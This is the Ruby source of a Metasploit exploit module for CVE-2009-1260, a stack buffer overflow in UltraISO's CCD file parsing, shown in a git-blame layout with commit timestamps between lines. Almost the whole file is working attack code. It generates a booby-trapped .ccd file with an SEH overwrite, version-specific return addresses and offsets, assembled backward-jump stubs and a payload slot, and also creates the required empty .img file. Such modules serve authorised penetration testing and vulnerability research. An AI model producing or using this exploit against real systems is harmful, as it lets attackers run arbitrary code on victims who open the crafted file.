2010-03-24 19:35:29 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-03-24 19:35:29 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = GreatRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'UltraISO CCD File Parsing Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack-based buffer overflow in EZB Systems, Inc's
|
|
|
|
UltraISO. When processing .CCD files, data is read from file into a
|
|
|
|
fixed-size stack buffer. Since no bounds checking is done, a buffer overflow
|
|
|
|
can occur. Attackers can execute arbitrary code by convincing their victim
|
|
|
|
to open an CCD file.
|
|
|
|
|
|
|
|
NOTE: A file with the same base name, but the extension of "img" must also
|
|
|
|
exist. Opening either file will trigger the vulnerability, but the files must
|
|
|
|
both exist.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'jduck' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2009-1260' ],
|
|
|
|
[ 'OSVDB', '53275' ],
|
|
|
|
[ 'BID', '34363' ],
|
|
|
|
# NOTE: The following BID is a duplicate of BID 34363
|
|
|
|
[ 'BID', '38613' ],
|
|
|
|
# NOTE: The following OSVDB entry seems invalid, the IMG file doesn't appear to trigger any vulnerability.
|
|
|
|
# [ 'OS-VDB', '53425' ],
|
2012-10-23 19:02:09 +00:00
|
|
|
[ 'EDB', '8343' ]
|
2010-03-24 19:35:29 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 2048,
|
|
|
|
'BadChars' => "\x00\x08\x0a\x0d\x20",
|
|
|
|
'DisableNops' => true,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# Tested OK on:
|
|
|
|
# v9.3.3.2685
|
|
|
|
# v9.3.6.2750
|
|
|
|
|
|
|
|
# The EXE base addr contains a bad char (nul). This prevents us from
|
|
|
|
# using the super-elite multi-offset SEH exploitation method.
|
|
|
|
|
|
|
|
[ 'Windows Universal - Double-Click/Command Line Open Method',
|
|
|
|
{
|
|
|
|
'Offset' => 4094,
|
|
|
|
# NOTE: lame_enc.dll isn't loaded when opening via double-click / cmd line.
|
|
|
|
#'Ret' => 0x10011640 # p/p/r in lame_enc.dll
|
|
|
|
# To make matters even worse, we can't use system dlls due to Safe SEH!
|
|
|
|
#'Ret' => 0x71b26b7e # p/p/r in mpr.dll
|
|
|
|
'Ret' => 0x00403856 # p/p/r in unpacked UltraISO.exe (from public exploit)
|
|
|
|
}
|
|
|
|
],
|
|
|
|
[ 'Windows Universal - File->Open + Toolbar Open Methods',
|
|
|
|
{
|
|
|
|
'Offset' => [ 5066, 5158 ],
|
|
|
|
'Ret' => 0x10011640 # p/p/r in lame_enc.dll
|
|
|
|
}
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => 'Apr 03 2009',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ccd']),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' using target '#{target.name}' ...")
|
|
|
|
|
|
|
|
sploit = "[CloneCD]\r\n"
|
|
|
|
sploit << "Version=3\r\n"
|
|
|
|
|
|
|
|
sploit << "[Disc]\r\n"
|
|
|
|
sploit << "TocEntries=4\r\n"
|
|
|
|
sploit << "Sessions=1\r\n"
|
|
|
|
sploit << "DataTracksScrambled=0\r\n"
|
|
|
|
sploit << "CDTextLength=0\r\n"
|
|
|
|
|
|
|
|
sploit << "[Session 1]\r\n"
|
|
|
|
sploit << "PreGapMode=1\r\n"
|
|
|
|
sploit << "PreGapSubC=0\r\n"
|
|
|
|
sploit << "[Entry 0]\r\n"
|
|
|
|
sploit << "Session=1\r\n"
|
|
|
|
sploit << "Point=0xa0\r\n"
|
|
|
|
sploit << "ADR=0x01\r\n"
|
|
|
|
sploit << "Control=0x04\r\n"
|
|
|
|
sploit << "TrackNo=0\r\n"
|
|
|
|
sploit << "AMin=0\r\n"
|
|
|
|
sploit << "ASec=0\r\n"
|
|
|
|
sploit << "AFrame=0\r\n"
|
|
|
|
sploit << "ALBA=-150\r\n"
|
|
|
|
sploit << "Zero=0\r\n"
|
|
|
|
sploit << "PMin=1\r\n"
|
|
|
|
sploit << "PSec=0\r\n"
|
|
|
|
sploit << "PFrame=0\r\n"
|
|
|
|
sploit << "PLBA=4350\r\n"
|
|
|
|
|
|
|
|
sploit << "[Entry 1]\r\n"
|
|
|
|
sploit << "Session=1\r\n"
|
|
|
|
sploit << "Point=0xa1\r\n"
|
|
|
|
sploit << "ADR=0x01\r\n"
|
|
|
|
sploit << "Control=0x04\r\n"
|
|
|
|
sploit << "TrackNo=0\r\n"
|
|
|
|
sploit << "AMin=0\r\n"
|
|
|
|
sploit << "ASec=0\r\n"
|
|
|
|
sploit << "AFrame=0\r\n"
|
|
|
|
sploit << "ALBA=-150\r\n"
|
|
|
|
sploit << "Zero=0\r\n"
|
|
|
|
sploit << "PMin=1\r\n"
|
|
|
|
sploit << "PSec=0\r\n"
|
|
|
|
sploit << "PFrame=0\r\n"
|
|
|
|
sploit << "PLBA=4350\r\n"
|
|
|
|
|
|
|
|
sploit << "[Entry 2]\r\n"
|
|
|
|
sploit << "Session=1\r\n"
|
|
|
|
sploit << "Point=0xa2\r\n"
|
|
|
|
sploit << "ADR=0x01\r\n"
|
|
|
|
sploit << "Control=0x04\r\n"
|
|
|
|
sploit << "TrackNo=0\r\n"
|
|
|
|
sploit << "AMin=0\r\n"
|
|
|
|
sploit << "ASec=0\r\n"
|
|
|
|
sploit << "AFrame=0\r\n"
|
|
|
|
sploit << "ALBA=-150\r\n"
|
|
|
|
sploit << "Zero=0\r\n"
|
|
|
|
sploit << "PMin=0\r\n"
|
|
|
|
sploit << "PSec=2\r\n"
|
|
|
|
sploit << "PFrame=34\r\n"
|
|
|
|
sploit << "PLBA=34\r\n"
|
|
|
|
|
|
|
|
sploit << "[Entry 3]\r\n"
|
|
|
|
sploit << "Session=1\r\n"
|
|
|
|
sploit << "Point=0x01\r\n"
|
|
|
|
sploit << "ADR=0x01\r\n"
|
|
|
|
sploit << "Control=0x04\r\n"
|
|
|
|
sploit << "TrackNo=0\r\n"
|
|
|
|
sploit << "AMin=0\r\n"
|
|
|
|
sploit << "ASec=0\r\n"
|
|
|
|
sploit << "AFrame=0\r\n"
|
|
|
|
sploit << "ALBA=-150\r\n"
|
|
|
|
sploit << "Zero=0\r\n"
|
|
|
|
sploit << "PMin=0\r\n"
|
|
|
|
sploit << "PSec=2\r\n"
|
|
|
|
sploit << "PFrame=0\r\n"
|
|
|
|
sploit << "PLBA=0\r\n"
|
|
|
|
|
|
|
|
sploit << "[TRACK 1]\r\n"
|
|
|
|
sploit << "MODE=1\r\n"
|
|
|
|
sploit << "INDEX 1="
|
|
|
|
|
|
|
|
idx_line = ''
|
|
|
|
idx_line << rand_text_alphanumeric(1000) * 9
|
|
|
|
|
|
|
|
# Stick the payload at the beginning
|
|
|
|
idx_line[0,payload.encoded.length] = payload.encoded
|
|
|
|
|
|
|
|
# If we have an array of offets, handle it specially
|
|
|
|
seh_offset = target['Offset']
|
2010-04-30 08:40:19 +00:00
|
|
|
if (seh_offset.is_a?(::Array))
|
2010-03-24 19:35:29 +00:00
|
|
|
# Multiple offets that can be used simultaneously
|
|
|
|
seh_offset.each { |off|
|
|
|
|
seh = generate_seh_record(target.ret)
|
|
|
|
distance = off + seh.length
|
|
|
|
jmp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
|
|
|
|
|
|
|
idx_line[off, seh.length] = seh
|
|
|
|
idx_line[off+seh.length, jmp.length] = jmp
|
|
|
|
}
|
|
|
|
else
|
|
|
|
off = seh_offset
|
|
|
|
# We'll manually construct this double-backward jumping SEH handler frame
|
|
|
|
distance = off - 5
|
|
|
|
jmp1 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
|
|
|
distance = jmp1.length
|
|
|
|
jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
|
|
|
seh = ''
|
|
|
|
seh << jmp2
|
|
|
|
seh << rand_text(2)
|
|
|
|
seh << [target.ret].pack('V')
|
|
|
|
# we can't put anything below the return address due to a potential nul byte in it
|
|
|
|
|
|
|
|
# Add the double-back-jumping SEH frame
|
|
|
|
idx_line[off-5, jmp1.length] = jmp1
|
|
|
|
idx_line[off,seh.length] = seh
|
|
|
|
end
|
|
|
|
|
|
|
|
sploit << idx_line
|
|
|
|
|
|
|
|
file_create(sploit)
|
|
|
|
|
|
|
|
# create the empty IMG file
|
|
|
|
imgfn = datastore['FILENAME'].dup
|
|
|
|
imgfn.gsub!(/\.ccd$/, '.img')
|
2011-06-09 19:51:56 +00:00
|
|
|
out = imgfn
|
2010-03-24 19:35:29 +00:00
|
|
|
File.new(out,"wb").close
|
|
|
|
print_status("Created empty output file #{out}")
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|